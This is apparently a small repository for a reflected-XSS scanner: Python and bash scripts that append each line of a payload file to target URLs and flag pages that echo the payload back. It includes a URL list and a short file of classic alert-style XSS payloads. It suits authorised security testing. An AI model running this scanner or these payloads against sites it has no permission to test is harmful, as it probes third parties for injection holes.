xss.py – python
import urllib
import urllib.parse
import urllib.request

import colorama
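# Reflected-XSS probe over GET: for every URL in urls.txt, append every line of
# the payload file and report whether the raw payload string comes back in the
# response body.
#
# A reflection hit only shows that the input is echoed unencoded somewhere in
# the page; whether it is exploitable depends on the surrounding context
# (element body, attribute, script), the response Content-Type and any CSP, so
# "page vulnerable" is a lead to confirm by hand, not a finding. Very short
# payloads such as "xxx" can occur in a page on their own, so expect false
# positives from those.
print('----------- XSS Attack -----------')
print('--------- GET URL ATTACK --------')
urlFile = "urls.txt"
xssPayload = "../_payload/xss_payload.txt"


def build_test_url(base_url: str, payload: str) -> str:
    """Return *base_url* with *payload* percent-encoded and appended.

    The original concatenated the raw payload; spaces, quotes and '<' in a
    URL are rejected by urlopen and also mis-report what was actually sent.
    Every character outside the unreserved set is encoded, which is what a
    browser would do with the same query-string value.
    """
    return base_url + urllib.parse.quote(payload, safe="")


def is_reflected(test_url: str, payload: str, timeout: float = 10.0):
    """Fetch *test_url* and tell whether *payload* appears verbatim in the body.

    Returns True/False for a completed request and None when the request
    failed (connection error, non-2xx status, timeout), so the caller can
    distinguish "not reflected" from "could not check". The body is decoded
    as UTF-8 with replacement so a non-UTF-8 page does not abort the run.
    The response is closed by the ``with`` block.
    """
    try:
        with urllib.request.urlopen(test_url, timeout=timeout) as response:
            body = response.read().decode("utf-8", errors="replace")
    except OSError:  # URLError/HTTPError and socket timeouts are OSError subclasses
        return None
    return payload in body


def read_lines(path: str):
    """Return the non-empty, right-stripped lines of the text file at *path*."""
    with open(path) as handle:
        return [line.rstrip() for line in handle if line.rstrip()]


def main():
    """Run every payload against every URL and print one coloured line per pair."""
    payloads = read_lines(xssPayload)  # read once, not once per URL
    for url in read_lines(urlFile):
        for xss in payloads:
            test_url = build_test_url(url, xss)
            reflected = is_reflected(test_url, xss)
            if reflected is None:
                # Mirror the shell version: a failed request is skipped, not fatal.
                print("- xss payload: " + test_url + " request failed, skipped")
            elif reflected:
                print("- xss payload: " + test_url + colorama.Fore.RED + ' page vulnerable to attack ' + colorama.Fore.RESET)
            else:
                print("- xss payload: " + test_url + colorama.Fore.GREEN + ' not this time man ' + colorama.Fore.RESET)


if __name__ == "__main__":
    main()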
xss.sh – bash
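#!/usr/bin/env bash
# Reflected-XSS probe over GET: append each payload to each URL and report
# whether the raw payload string is echoed back in the response body. A hit
# means the input is reflected unencoded, not that it is exploitable; confirm
# the context by hand before treating it as a finding.
set -u

echo '--------- XSS Attack --------'
URL_FILE=urls.txt
XSS_PAYLOAD=xss_payload.txt
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'

# Private temp file instead of a fixed, predictable path under a home dir;
# the trap removes it on any exit, not only on the happy path.
TMP_FILE=$(mktemp) || exit 1
trap 'rm -f "${TMP_FILE}"' EXIT

echo '- temp file location: ' "${TMP_FILE}"
echo '- file with urls: ' "${PWD}/${URL_FILE}"
echo '- file with xss payload: ' "${PWD}/${XSS_PAYLOAD}"
echo '-----------------------------'

# Percent-encode every byte outside the unreserved set; the original replaced
# only spaces, so '<', '"' and '#' went out raw. Assumes ASCII payloads.
urlencode() {
  local s=$1 out='' c i
  for (( i = 0; i < ${#s}; i++ )); do
    c=${s:i:1}
    case $c in
      [A-Za-z0-9._~-]) out+=$c ;;
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# -r keeps backslashes in payloads literal; blank lines are skipped.
while IFS= read -r url; do
  [ -z "${url}" ] && continue
  while IFS= read -r xss; do
    [ -z "${xss}" ] && continue
    xss_url_format=$(urlencode "${xss}")
    # Truncate first: with -f curl writes nothing on an HTTP error, and the
    # previous response would otherwise be grepped again (stale match).
    : > "${TMP_FILE}"
    curl -f -s --max-time 10 -o "${TMP_FILE}" "${url}${xss_url_format}"
    # -F: the payload is a literal string, not a regex ('.' or '*' in it
    # would otherwise match almost anything).
    if grep -qF -- "${xss}" "${TMP_FILE}"; then
      echo -e ' - xss payload:' "${url}${xss_url_format}" "${RED}"' page vulnerable to attack'"${NC}"
    else
      echo -e ' - xss payload:' "${url}${xss_url_format}" "${GREEN}"' not this time man'"${NC}"
    fi
  done < "${XSS_PAYLOAD}"
done < "${URL_FILE}"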
urls.txt
http://example_page.net/search.php?s=
xss_payload.txt
xxx
<h1>xxx</h1>
<h1>xxx
<b>xxx</b>
<b>xxx
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>